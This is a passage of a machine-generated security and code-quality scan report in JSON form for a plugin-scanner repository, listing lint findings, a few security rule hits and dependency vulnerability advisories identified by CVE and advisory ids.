Review if needed."}, "properties": {"repobilityId": 145001, "scanner": "repobility-threat-engine", "fingerprint": "7c3f5fea021fd360bf7e98fcf069f53a04216cdd0d8f799e773ac5bfb2132889", "category": "quality", "severity": "info", "confidence": 0.2, "triageState": "false_positive", "verdict": "likely_fp", "isResolved": true, "reason": "Deduplicated summary only: 19 additional occurrences found. The top occurrences remain visible as actionable findings.", "evidence": {"mined": true, "mining": {"slug": "python-dataclass-no-fields", "owasp": null, "cwe_ids": [], "languages": ["python"], "precision": 1.0, "promoted_at": "2026-05-18T14:01:32.348046+00:00", "triaged_in_corpus": 10, "observations_count": 92448, "ai_coder_pattern_id": 144}, "scanner": "repobility-threat-engine", "aggregated": true, "correlation_key": "fp|7c3f5fea021fd360bf7e98fcf069f53a04216cdd0d8f799e773ac5bfb2132889", "aggregated_count": 19}}}, {"ruleId": "MINED062", "level": "none", "message": {"text": "[MINED062] Python Dataclass No Fields: @dataclass over an empty class \u2014 unfinished model."}, "properties": {"repobilityId": 145000, "scanner": "repobility-threat-engine", "fingerprint": "60eeda2adc88b9a08ecc1a3745babe98efeecbf840c4c4533d9424fe2b44c025", "category": "quality", "severity": "info", "confidence": 1.0, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "Pattern matched with no mitigating context found", "evidence": {"mined": true, "mining": {"slug": "python-dataclass-no-fields", "owasp": null, "cwe_ids": [], "languages": ["python"], "precision": 1.0, "promoted_at": "2026-05-18T14:01:32.348046+00:00", "triaged_in_corpus": 10, "observations_count": 92448, "ai_coder_pattern_id": 144}, "scanner": "repobility-threat-engine", "correlation_key": "fp|60eeda2adc88b9a08ecc1a3745babe98efeecbf840c4c4533d9424fe2b44c025"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/guard/adapters/mcp_servers.py"}, "region": {"startLine": 14}}}]}, 
{"ruleId": "MINED062", "level": "none", "message": {"text": "[MINED062] Python Dataclass No Fields: @dataclass over an empty class \u2014 unfinished model."}, "properties": {"repobilityId": 144999, "scanner": "repobility-threat-engine", "fingerprint": "3d45bd6033a91b07c5a3e25c7b0c5510bb92808fc4fbf15801ba3c415592299b", "category": "quality", "severity": "info", "confidence": 1.0, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "Pattern matched with no mitigating context found", "evidence": {"mined": true, "mining": {"slug": "python-dataclass-no-fields", "owasp": null, "cwe_ids": [], "languages": ["python"], "precision": 1.0, "promoted_at": "2026-05-18T14:01:32.348046+00:00", "triaged_in_corpus": 10, "observations_count": 92448, "ai_coder_pattern_id": 144}, "scanner": "repobility-threat-engine", "correlation_key": "fp|3d45bd6033a91b07c5a3e25c7b0c5510bb92808fc4fbf15801ba3c415592299b"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/ecosystems/types.py"}, "region": {"startLine": 19}}}]}, {"ruleId": "MINED062", "level": "none", "message": {"text": "[MINED062] Python Dataclass No Fields: @dataclass over an empty class \u2014 unfinished model."}, "properties": {"repobilityId": 144998, "scanner": "repobility-threat-engine", "fingerprint": "43bb405e71e1049d610494d908f4ffc4557c028a7173ca9e49e83f0e15994f60", "category": "quality", "severity": "info", "confidence": 1.0, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "Pattern matched with no mitigating context found", "evidence": {"mined": true, "mining": {"slug": "python-dataclass-no-fields", "owasp": null, "cwe_ids": [], "languages": ["python"], "precision": 1.0, "promoted_at": "2026-05-18T14:01:32.348046+00:00", "triaged_in_corpus": 10, "observations_count": 92448, "ai_coder_pattern_id": 144}, "scanner": "repobility-threat-engine", "correlation_key": "fp|43bb405e71e1049d610494d908f4ffc4557c028a7173ca9e49e83f0e15994f60"}}, 
"locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/checks/mcp_security.py"}, "region": {"startLine": 13}}}]}, {"ruleId": "COMP001", "level": "none", "message": {"text": "[COMP001] High cognitive complexity (and 85 more): Same pattern found in 85 additional files. Review if needed."}, "properties": {"repobilityId": 144997, "scanner": "repobility-threat-engine", "fingerprint": "7c5e4da366adccc7ef81d6f37d14b62312a4acc17ad37f689910af322e928ef0", "category": "quality", "severity": "info", "confidence": 0.2, "triageState": "false_positive", "verdict": "likely_fp", "isResolved": true, "reason": "Deduplicated summary only: 85 additional occurrences found. The top occurrences remain visible as actionable findings.", "evidence": {"scanner": "repobility-threat-engine", "function": "check_skill_frontmatter", "breakdown": {"if": 8, "for": 1, "except": 1, "continue": 3, "nested_bonus": 4}, "aggregated": true, "complexity": 17, "correlation_key": "fp|7c5e4da366adccc7ef81d6f37d14b62312a4acc17ad37f689910af322e928ef0", "aggregated_count": 85}}}, {"ruleId": "MINED056", "level": "none", "message": {"text": "[MINED056] React Key As Index: key={index} in map() \u2014 re-renders the wrong elements on re-order."}, "properties": {"repobilityId": 144992, "scanner": "repobility-threat-engine", "fingerprint": "f2097b26c50c6cd15e1f51d6b2e6d47f3bc20456971ab1dd86997cadc5ec9853", "category": "quality", "severity": "info", "confidence": 1.0, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "Pattern matched with no mitigating context found", "evidence": {"mined": true, "mining": {"slug": "react-key-as-index", "owasp": null, "cwe_ids": ["CWE-682"], "languages": ["typescript", "tsx", "javascript", "jsx"], "precision": 1.0, "promoted_at": "2026-05-18T14:01:32.348032+00:00", "triaged_in_corpus": 12, "observations_count": 299917, "ai_coder_pattern_id": 135}, "scanner": "repobility-threat-engine", "correlation_key": 
"fp|f2097b26c50c6cd15e1f51d6b2e6d47f3bc20456971ab1dd86997cadc5ec9853"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "dashboard/src/evidence/sparkline.tsx"}, "region": {"startLine": 31}}}]}, {"ruleId": "SEC029", "level": "none", "message": {"text": "[SEC029] Server-Side Request Forgery (SSRF) \u2014 outbound HTTP from user input (and 11 more): Same pattern found in 11 additional files. Review if needed."}, "properties": {"repobilityId": 144991, "scanner": "repobility-threat-engine", "fingerprint": "6e6b1fa9aa37cd5353c53477b8935ccc1c8f42b61f420ebd0ceb44871ba243eb", "category": "ssrf", "severity": "info", "confidence": 0.2, "triageState": "false_positive", "verdict": "likely_fp", "isResolved": true, "reason": "Deduplicated summary only: 11 additional occurrences found. The top occurrences remain visible as actionable findings.", "evidence": {"reason": "Deduplicated summary only: 11 additional occurrences found. The top occurrences remain visible as actionable findings.", "rule_id": "SEC029", "scanner": "repobility-threat-engine", "confidence": 0.2, "correlation_key": "fp|6e6b1fa9aa37cd5353c53477b8935ccc1c8f42b61f420ebd0ceb44871ba243eb"}}}, {"ruleId": "MINED045", "level": "none", "message": {"text": "[MINED045] Ts Non Null Assertion: x! 
asserts not null - bypasses null checks - TypeError if wrong."}, "properties": {"repobilityId": 144987, "scanner": "repobility-threat-engine", "fingerprint": "4ed4f25b0dc837430bccaed52d622146f4eabf299eacc8034b9050977a8bff8c", "category": "quality", "severity": "info", "confidence": 1.0, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "Pattern matched with no mitigating context found", "evidence": {"mined": true, "mining": {"slug": "ts-non-null-assertion", "owasp": null, "cwe_ids": ["CWE-476"], "languages": ["typescript", "tsx"], "precision": 1.0, "promoted_at": "2026-05-18T14:01:32.348005+00:00", "triaged_in_corpus": 12, "observations_count": 1810954, "ai_coder_pattern_id": 105}, "scanner": "repobility-threat-engine", "correlation_key": "fp|4ed4f25b0dc837430bccaed52d622146f4eabf299eacc8034b9050977a8bff8c"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "dashboard/src/evidence/categories.tsx"}, "region": {"startLine": 242}}}]}, {"ruleId": "MINED044", "level": "none", "message": {"text": "[MINED044] Js Console Log Prod: console.log left in code. 
Should be replaced with logger or removed."}, "properties": {"repobilityId": 144986, "scanner": "repobility-threat-engine", "fingerprint": "f378073b94b08b670c7bcee19a6da9cbe61be25f06e0c3f51e1c2246ed5d8d56", "category": "quality", "severity": "info", "confidence": 1.0, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "Pattern matched with no mitigating context found", "evidence": {"mined": true, "mining": {"slug": "js-console-log-prod", "owasp": null, "cwe_ids": ["CWE-532"], "languages": ["javascript", "typescript", "tsx", "jsx"], "precision": 1.0, "promoted_at": "2026-05-18T14:01:32.348003+00:00", "triaged_in_corpus": 10, "observations_count": 1940833, "ai_coder_pattern_id": 102}, "scanner": "repobility-threat-engine", "correlation_key": "fp|f378073b94b08b670c7bcee19a6da9cbe61be25f06e0c3f51e1c2246ed5d8d56"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "dashboard/src/error-boundary.tsx"}, "region": {"startLine": 25}}}]}, {"ruleId": "SEC045", "level": "none", "message": {"text": "[SEC045] eval()/exec() on stored or user-supplied data (and 1 more): Same pattern found in 1 additional files. Review if needed."}, "properties": {"repobilityId": 144983, "scanner": "repobility-threat-engine", "fingerprint": "c59edcd8286991ab7caac4493f8f01b268fef2a5d218265ad20f6e2d1172fefb", "category": "injection", "severity": "info", "confidence": 0.2, "triageState": "false_positive", "verdict": "likely_fp", "isResolved": true, "reason": "Deduplicated summary only: 1 additional occurrences found. The top occurrences remain visible as actionable findings.", "evidence": {"reason": "Deduplicated summary only: 1 additional occurrences found. 
The top occurrences remain visible as actionable findings.", "rule_id": "SEC045", "scanner": "repobility-threat-engine", "confidence": 0.2, "correlation_key": "fp|c59edcd8286991ab7caac4493f8f01b268fef2a5d218265ad20f6e2d1172fefb"}}}, {"ruleId": "DEPCUR-NPM", "level": "none", "message": {"text": "npm package `@types/react-dom` is patch version(s) behind (^19.2.2 -> 19.2.3)"}, "properties": {"repobilityId": 144975, "scanner": "repobility-dependency-currency", "fingerprint": "4d7288a6a1b9b9017a12b0a37c8865e0d366ba7d147648866bc7a721ebc35188", "category": "dependency", "severity": "info", "confidence": 0.9, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"gap": "patch version(s) behind", "signal": "currency", "cwe_ids": [], "package": "@types/react-dom", "scanner": "repobility-dependency-currency", "ecosystem": "npm", "languages": ["javascript"], "latest_version": "19.2.3", "correlation_key": "fp|4d7288a6a1b9b9017a12b0a37c8865e0d366ba7d147648866bc7a721ebc35188", "current_version": "^19.2.2"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "dashboard/package.json"}, "region": {"startLine": 1}}}]}, {"ruleId": "DEPCUR-NPM", "level": "none", "message": {"text": "npm package `react-qr-code` is patch version(s) behind (^2.0.16 -> 2.0.21)"}, "properties": {"repobilityId": 144974, "scanner": "repobility-dependency-currency", "fingerprint": "0be75eba65cbc8a2900d22b09492166b0a8416ba2aa2fce041ded7c1101574bd", "category": "dependency", "severity": "info", "confidence": 0.9, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"gap": "patch version(s) behind", "signal": "currency", "cwe_ids": [], "package": "react-qr-code", "scanner": "repobility-dependency-currency", "ecosystem": "npm", "languages": ["javascript"], "latest_version": "2.0.21", "correlation_key": "fp|0be75eba65cbc8a2900d22b09492166b0a8416ba2aa2fce041ded7c1101574bd", "current_version": "^2.0.16"}}, "locations": 
[{"physicalLocation": {"artifactLocation": {"uri": "dashboard/package.json"}, "region": {"startLine": 1}}}]}, {"ruleId": "JRN009", "level": "error", "message": {"text": "Secret-like setting is echoed into a password input value"}, "properties": {"repobilityId": 145130, "scanner": "repobility-journey-contract", "fingerprint": "5fab04f24d5b989b76699e9e25295e80c8ed202575b41796197e6c1e353447f3", "category": "auth", "severity": "high", "confidence": 0.83, "triageState": "open", "verdict": "likely", "isResolved": false, "reason": "A password or secret-named input is populated from a secret-like variable instead of a masked placeholder.", "evidence": {"rule_id": "JRN009", "scanner": "repobility-journey-contract", "references": ["https://cheatsheetseries.owasp.org/cheatsheets/Session_Management_Cheat_Sheet.html"], "correlation_key": "code|auth|token|48|jrn009"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "dashboard/src/approval-proof-modal.tsx"}, "region": {"startLine": 48}}}]}, {"ruleId": "PYSEC-2026-161", "level": "error", "message": {"text": "starlette: PYSEC-2026-161"}, "properties": {"repobilityId": 145126, "scanner": "osv-scanner", "fingerprint": "993c965e051ac08384f28c004ed2828303fa08d6e623c80da1211dbce5cea7ce", "category": "dependency", "severity": "high", "confidence": 0.88, "triageState": "open", "verdict": "", "isResolved": false, "reason": "Collapsed 1 duplicate scanner signal(s) for the same underlying issue.", "evidence": {"match": "", "aliases": ["CVE-2026-48710", "GHSA-86qp-5c8j-p5mr", "X41-2026-002"], "package": "starlette", "rule_id": "PYSEC-2026-161", "scanner": "osv-scanner", "correlation_key": "vuln|starlette|CVE-2026-48710|uv.lock", "duplicate_count": 1, "duplicate_rule_ids": ["GHSA-86qp-5c8j-p5mr", "PYSEC-2026-161"], "duplicate_scanners": ["osv-scanner"], "duplicate_fingerprints": ["20d0e73bab623b5772bb5ee81b54e26f25bfd7b3f632ca3aec483536eb176c89", "993c965e051ac08384f28c004ed2828303fa08d6e623c80da1211dbce5cea7ce"]}}, 
"locations": [{"physicalLocation": {"artifactLocation": {"uri": "uv.lock"}, "region": {"startLine": 1}}}]}, {"ruleId": "PYSEC-2026-179", "level": "error", "message": {"text": "pyjwt: PYSEC-2026-179"}, "properties": {"repobilityId": 145125, "scanner": "osv-scanner", "fingerprint": "3a8c92a4bc42452ab63c8b780593c12b550761e77665f811c437dd35791069ae", "category": "dependency", "severity": "high", "confidence": 0.88, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"match": "", "aliases": ["CVE-2026-48526", "GHSA-xgmm-8j9v-c9wx"], "package": "pyjwt", "rule_id": "PYSEC-2026-179", "scanner": "osv-scanner", "correlation_key": "vuln|pyjwt|CVE-2026-48526|uv.lock"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "uv.lock"}, "region": {"startLine": 1}}}]}, {"ruleId": "PYSEC-2026-178", "level": "error", "message": {"text": "pyjwt: PYSEC-2026-178"}, "properties": {"repobilityId": 145124, "scanner": "osv-scanner", "fingerprint": "529afc49608a001ef35ca72e2e5bf2ab615fb9fdf39e2d3fc621ae3c7274698b", "category": "dependency", "severity": "high", "confidence": 0.88, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"match": "", "aliases": ["CVE-2026-48525", "GHSA-w7vc-732c-9m39"], "package": "pyjwt", "rule_id": "PYSEC-2026-178", "scanner": "osv-scanner", "correlation_key": "vuln|pyjwt|CVE-2026-48525|uv.lock"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "uv.lock"}, "region": {"startLine": 1}}}]}, {"ruleId": "PYSEC-2026-177", "level": "error", "message": {"text": "pyjwt: PYSEC-2026-177"}, "properties": {"repobilityId": 145123, "scanner": "osv-scanner", "fingerprint": "e4a57bf8d7416024fd079256b08e268bcee4f11f05b7eaee044fc1d8b95a1189", "category": "dependency", "severity": "high", "confidence": 0.88, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"match": "", "aliases": ["CVE-2026-48524", "GHSA-fhv5-28vv-h8m8"], "package": "pyjwt", 
"rule_id": "PYSEC-2026-177", "scanner": "osv-scanner", "correlation_key": "vuln|pyjwt|CVE-2026-48524|uv.lock"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "uv.lock"}, "region": {"startLine": 1}}}]}, {"ruleId": "PYSEC-2026-175", "level": "error", "message": {"text": "pyjwt: PYSEC-2026-175"}, "properties": {"repobilityId": 145122, "scanner": "osv-scanner", "fingerprint": "5008712fe3bda523fafb9d2d087e037a86c42cd2bee1401e12b9c2d636db62f1", "category": "dependency", "severity": "high", "confidence": 0.88, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"match": "", "aliases": ["CVE-2026-48522", "GHSA-993g-76c3-p5m4"], "package": "pyjwt", "rule_id": "PYSEC-2026-175", "scanner": "osv-scanner", "correlation_key": "vuln|pyjwt|CVE-2026-48522|uv.lock"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "uv.lock"}, "region": {"startLine": 1}}}]}, {"ruleId": "GO-2026-5039", "level": "error", "message": {"text": "stdlib: GO-2026-5039"}, "properties": {"repobilityId": 145118, "scanner": "osv-scanner", "fingerprint": "227084fa5c6747ed982a63670a5dec95ba82dbebfede35fcb76d6473fccbafb2", "category": "dependency", "severity": "high", "confidence": 0.88, "triageState": "open", "verdict": "", "isResolved": false, "reason": "Collapsed 1 duplicate scanner signal(s) for the same underlying issue.", "evidence": {"match": "", "aliases": ["BIT-golang-2026-42507", "CVE-2026-42507"], "package": "stdlib", "rule_id": "GO-2026-5039", "scanner": "osv-scanner", "correlation_key": "vuln|stdlib|CVE-2026-42507|token", "duplicate_count": 1, "duplicate_rule_ids": ["GO-2026-5039"], "duplicate_scanners": ["osv-scanner"], "duplicate_fingerprints": ["227084fa5c6747ed982a63670a5dec95ba82dbebfede35fcb76d6473fccbafb2", "902a1d02fa9651d7c2f19198abd9cca1ff69914f56f9c6439e9db80f36027361"]}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/fixtures/tier2/go-safe/go.mod"}, "region": {"startLine": 1}}}]}, {"ruleId": 
"GO-2026-5038", "level": "error", "message": {"text": "stdlib: GO-2026-5038"}, "properties": {"repobilityId": 145117, "scanner": "osv-scanner", "fingerprint": "d2de60fbfc3b1b812e412dbd39a31abb5dbfc786aee1200ea761d2006844b927", "category": "dependency", "severity": "high", "confidence": 0.88, "triageState": "open", "verdict": "", "isResolved": false, "reason": "Collapsed 1 duplicate scanner signal(s) for the same underlying issue.", "evidence": {"match": "", "aliases": ["BIT-golang-2026-42504", "CVE-2026-42504"], "package": "stdlib", "rule_id": "GO-2026-5038", "scanner": "osv-scanner", "correlation_key": "vuln|stdlib|CVE-2026-42504|token", "duplicate_count": 1, "duplicate_rule_ids": ["GO-2026-5038"], "duplicate_scanners": ["osv-scanner"], "duplicate_fingerprints": ["5a3581119ddfa9f20b1d145ff8eeb86320bf647b4351a2877b9cfe96187b139d", "d2de60fbfc3b1b812e412dbd39a31abb5dbfc786aee1200ea761d2006844b927"]}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/fixtures/tier2/go-safe/go.mod"}, "region": {"startLine": 1}}}]}, {"ruleId": "GO-2026-5037", "level": "error", "message": {"text": "stdlib: GO-2026-5037"}, "properties": {"repobilityId": 145116, "scanner": "osv-scanner", "fingerprint": "81c390edefbc310e700bdd4c3e6e72c683c1bf09d9ac0efdfade08e857fc80c9", "category": "dependency", "severity": "high", "confidence": 0.88, "triageState": "open", "verdict": "", "isResolved": false, "reason": "Collapsed 1 duplicate scanner signal(s) for the same underlying issue.", "evidence": {"match": "", "aliases": ["BIT-golang-2026-27145", "CVE-2026-27145"], "package": "stdlib", "rule_id": "GO-2026-5037", "scanner": "osv-scanner", "correlation_key": "vuln|stdlib|CVE-2026-27145|token", "duplicate_count": 1, "duplicate_rule_ids": ["GO-2026-5037"], "duplicate_scanners": ["osv-scanner"], "duplicate_fingerprints": ["2b1998403a58a3dff4d401caebf5463e4ce04f4456cb130b24e7ad59af6df21a", "81c390edefbc310e700bdd4c3e6e72c683c1bf09d9ac0efdfade08e857fc80c9"]}}, "locations": 
[{"physicalLocation": {"artifactLocation": {"uri": "tests/fixtures/tier2/go-safe/go.mod"}, "region": {"startLine": 1}}}]}, {"ruleId": "GO-2026-4986", "level": "error", "message": {"text": "stdlib: GO-2026-4986"}, "properties": {"repobilityId": 145115, "scanner": "osv-scanner", "fingerprint": "0be0b3f5355711c2edbb66c49bdab490d1b94a7a379fa8c2e126854c1481e924", "category": "dependency", "severity": "high", "confidence": 0.88, "triageState": "open", "verdict": "", "isResolved": false, "reason": "Collapsed 1 duplicate scanner signal(s) for the same underlying issue.", "evidence": {"match": "", "aliases": ["BIT-golang-2026-39820", "CVE-2026-39820"], "package": "stdlib", "rule_id": "GO-2026-4986", "scanner": "osv-scanner", "correlation_key": "vuln|stdlib|CVE-2026-39820|token", "duplicate_count": 1, "duplicate_rule_ids": ["GO-2026-4986"], "duplicate_scanners": ["osv-scanner"], "duplicate_fingerprints": ["0be0b3f5355711c2edbb66c49bdab490d1b94a7a379fa8c2e126854c1481e924", "21b22e37d5d78b374e7e1ac0fde23248b7941832834a4eaea242fe1f9e0ba394"]}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/fixtures/tier2/go-safe/go.mod"}, "region": {"startLine": 1}}}]}, {"ruleId": "GO-2026-4982", "level": "error", "message": {"text": "stdlib: GO-2026-4982"}, "properties": {"repobilityId": 145114, "scanner": "osv-scanner", "fingerprint": "91116bdf39dbc16f8c8d365c6a2683bf5cebcfda0aed458beffcbe92e61e16c7", "category": "dependency", "severity": "high", "confidence": 0.88, "triageState": "open", "verdict": "", "isResolved": false, "reason": "Collapsed 1 duplicate scanner signal(s) for the same underlying issue.", "evidence": {"match": "", "aliases": ["BIT-golang-2026-39823", "CVE-2026-39823"], "package": "stdlib", "rule_id": "GO-2026-4982", "scanner": "osv-scanner", "correlation_key": "vuln|stdlib|CVE-2026-39823|token", "duplicate_count": 1, "duplicate_rule_ids": ["GO-2026-4982"], "duplicate_scanners": ["osv-scanner"], "duplicate_fingerprints": 
["91116bdf39dbc16f8c8d365c6a2683bf5cebcfda0aed458beffcbe92e61e16c7", "9a199fb48f2f015f9b0d5bc05b60359a69fe633946991e2aa5aa785698c3c210"]}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/fixtures/tier2/go-safe/go.mod"}, "region": {"startLine": 1}}}]}, {"ruleId": "GO-2026-4981", "level": "error", "message": {"text": "stdlib: GO-2026-4981"}, "properties": {"repobilityId": 145113, "scanner": "osv-scanner", "fingerprint": "f78e05b9fe8faa30196efc6c5678912e2cf2ebc609487b0d8a58ea83456165ef", "category": "dependency", "severity": "high", "confidence": 0.88, "triageState": "open", "verdict": "", "isResolved": false, "reason": "Collapsed 1 duplicate scanner signal(s) for the same underlying issue.", "evidence": {"match": "", "aliases": ["BIT-golang-2026-33811", "CVE-2026-33811"], "package": "stdlib", "rule_id": "GO-2026-4981", "scanner": "osv-scanner", "correlation_key": "vuln|stdlib|CVE-2026-33811|token", "duplicate_count": 1, "duplicate_rule_ids": ["GO-2026-4981"], "duplicate_scanners": ["osv-scanner"], "duplicate_fingerprints": ["08cdedc9120a69a8dd2a4b4789c6cadd6131a3fa104655d4d8113775f31b4d53", "f78e05b9fe8faa30196efc6c5678912e2cf2ebc609487b0d8a58ea83456165ef"]}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/fixtures/tier2/go-safe/go.mod"}, "region": {"startLine": 1}}}]}, {"ruleId": "GO-2026-4980", "level": "error", "message": {"text": "stdlib: GO-2026-4980"}, "properties": {"repobilityId": 145112, "scanner": "osv-scanner", "fingerprint": "f930f3ac890d1add8dcfba19b4b163276cbecb0d819895a7db65796ae8e30ee5", "category": "dependency", "severity": "high", "confidence": 0.88, "triageState": "open", "verdict": "", "isResolved": false, "reason": "Collapsed 1 duplicate scanner signal(s) for the same underlying issue.", "evidence": {"match": "", "aliases": ["BIT-golang-2026-39826", "CVE-2026-39826"], "package": "stdlib", "rule_id": "GO-2026-4980", "scanner": "osv-scanner", "correlation_key": "vuln|stdlib|CVE-2026-39826|token", 
"duplicate_count": 1, "duplicate_rule_ids": ["GO-2026-4980"], "duplicate_scanners": ["osv-scanner"], "duplicate_fingerprints": ["5fc30490aa9269aee5f288c82906688671ec4f5c22adf8eeb91a81cfa3bec643", "f930f3ac890d1add8dcfba19b4b163276cbecb0d819895a7db65796ae8e30ee5"]}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/fixtures/tier2/go-safe/go.mod"}, "region": {"startLine": 1}}}]}, {"ruleId": "GO-2026-4977", "level": "error", "message": {"text": "stdlib: GO-2026-4977"}, "properties": {"repobilityId": 145111, "scanner": "osv-scanner", "fingerprint": "76edc7f8f086517d32d7792fcb2f7c4c8f40fcb95da8053544e42a56beb342c8", "category": "dependency", "severity": "high", "confidence": 0.88, "triageState": "open", "verdict": "", "isResolved": false, "reason": "Collapsed 1 duplicate scanner signal(s) for the same underlying issue.", "evidence": {"match": "", "aliases": ["BIT-golang-2026-42499", "CVE-2026-42499"], "package": "stdlib", "rule_id": "GO-2026-4977", "scanner": "osv-scanner", "correlation_key": "vuln|stdlib|CVE-2026-42499|token", "duplicate_count": 1, "duplicate_rule_ids": ["GO-2026-4977"], "duplicate_scanners": ["osv-scanner"], "duplicate_fingerprints": ["76edc7f8f086517d32d7792fcb2f7c4c8f40fcb95da8053544e42a56beb342c8", "b378ee709d4c0541e733d2acc42aafd62556e514dd7d544bd3287efdcdcbe85d"]}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/fixtures/tier2/go-safe/go.mod"}, "region": {"startLine": 1}}}]}, {"ruleId": "GO-2026-4976", "level": "error", "message": {"text": "stdlib: GO-2026-4976"}, "properties": {"repobilityId": 145110, "scanner": "osv-scanner", "fingerprint": "844d61c00b17767d8694c711317458e20f3b50804cac99df6c979cf950dc1b03", "category": "dependency", "severity": "high", "confidence": 0.88, "triageState": "open", "verdict": "", "isResolved": false, "reason": "Collapsed 1 duplicate scanner signal(s) for the same underlying issue.", "evidence": {"match": "", "aliases": ["BIT-golang-2026-39825", "CVE-2026-39825"], 
"package": "stdlib", "rule_id": "GO-2026-4976", "scanner": "osv-scanner", "correlation_key": "vuln|stdlib|CVE-2026-39825|token", "duplicate_count": 1, "duplicate_rule_ids": ["GO-2026-4976"], "duplicate_scanners": ["osv-scanner"], "duplicate_fingerprints": ["844d61c00b17767d8694c711317458e20f3b50804cac99df6c979cf950dc1b03", "b2d18e73090f464184fd257ed2f67d64dcb8baedc76545aea54cc4e9d2fe5107"]}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/fixtures/tier2/go-safe/go.mod"}, "region": {"startLine": 1}}}]}, {"ruleId": "GO-2026-4971", "level": "error", "message": {"text": "stdlib: GO-2026-4971"}, "properties": {"repobilityId": 145109, "scanner": "osv-scanner", "fingerprint": "8c9ef4f388e10fec7500e05fc16bf3b0d8432e2c200a7660d59bdcd51b8e6281", "category": "dependency", "severity": "high", "confidence": 0.88, "triageState": "open", "verdict": "", "isResolved": false, "reason": "Collapsed 1 duplicate scanner signal(s) for the same underlying issue.", "evidence": {"match": "", "aliases": ["BIT-golang-2026-39836", "CVE-2026-39836"], "package": "stdlib", "rule_id": "GO-2026-4971", "scanner": "osv-scanner", "correlation_key": "vuln|stdlib|CVE-2026-39836|token", "duplicate_count": 1, "duplicate_rule_ids": ["GO-2026-4971"], "duplicate_scanners": ["osv-scanner"], "duplicate_fingerprints": ["1f5979dc9b0c2128f0732af10155022201d041a58c8d94a2ca1918bd3bcc16ab", "8c9ef4f388e10fec7500e05fc16bf3b0d8432e2c200a7660d59bdcd51b8e6281"]}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/fixtures/tier2/go-safe/go.mod"}, "region": {"startLine": 1}}}]}, {"ruleId": "GO-2026-4947", "level": "error", "message": {"text": "stdlib: GO-2026-4947"}, "properties": {"repobilityId": 145108, "scanner": "osv-scanner", "fingerprint": "d1281d0b65e08ca9ee1405460c8e7f753d0c4d2db13ca7b5ea87d1bdc08d8234", "category": "dependency", "severity": "high", "confidence": 0.88, "triageState": "open", "verdict": "", "isResolved": false, "reason": "Collapsed 1 duplicate scanner 
signal(s) for the same underlying issue.", "evidence": {"match": "", "aliases": ["BIT-golang-2026-32280", "CVE-2026-32280"], "package": "stdlib", "rule_id": "GO-2026-4947", "scanner": "osv-scanner", "correlation_key": "vuln|stdlib|CVE-2026-32280|token", "duplicate_count": 1, "duplicate_rule_ids": ["GO-2026-4947"], "duplicate_scanners": ["osv-scanner"], "duplicate_fingerprints": ["c3a7296a652f0ba3c8cc95b5cc8380ab2cd7a1bdef66b8e07e4c3aa7f2084575", "d1281d0b65e08ca9ee1405460c8e7f753d0c4d2db13ca7b5ea87d1bdc08d8234"]}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/fixtures/tier2/go-safe/go.mod"}, "region": {"startLine": 1}}}]}, {"ruleId": "GO-2026-4946", "level": "error", "message": {"text": "stdlib: GO-2026-4946"}, "properties": {"repobilityId": 145107, "scanner": "osv-scanner", "fingerprint": "a370c15cedce5e7c75c158afb16fe93d181a4bd05db7151559a896bac57221a3", "category": "dependency", "severity": "high", "confidence": 0.88, "triageState": "open", "verdict": "", "isResolved": false, "reason": "Collapsed 1 duplicate scanner signal(s) for the same underlying issue.", "evidence": {"match": "", "aliases": ["BIT-golang-2026-32281", "CVE-2026-32281"], "package": "stdlib", "rule_id": "GO-2026-4946", "scanner": "osv-scanner", "correlation_key": "vuln|stdlib|CVE-2026-32281|token", "duplicate_count": 1, "duplicate_rule_ids": ["GO-2026-4946"], "duplicate_scanners": ["osv-scanner"], "duplicate_fingerprints": ["1f89a604627a3fb10ddb5748f92ab836aa430e642e036670dd3712adab990e7b", "a370c15cedce5e7c75c158afb16fe93d181a4bd05db7151559a896bac57221a3"]}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/fixtures/tier2/go-safe/go.mod"}, "region": {"startLine": 1}}}]}, {"ruleId": "GO-2026-4918", "level": "error", "message": {"text": "stdlib: GO-2026-4918"}, "properties": {"repobilityId": 145106, "scanner": "osv-scanner", "fingerprint": "5fca1fe24cce8213376dbf2d89dd0f478a34e42e0b012781b6ff4e5b0276177b", "category": "dependency", "severity": 
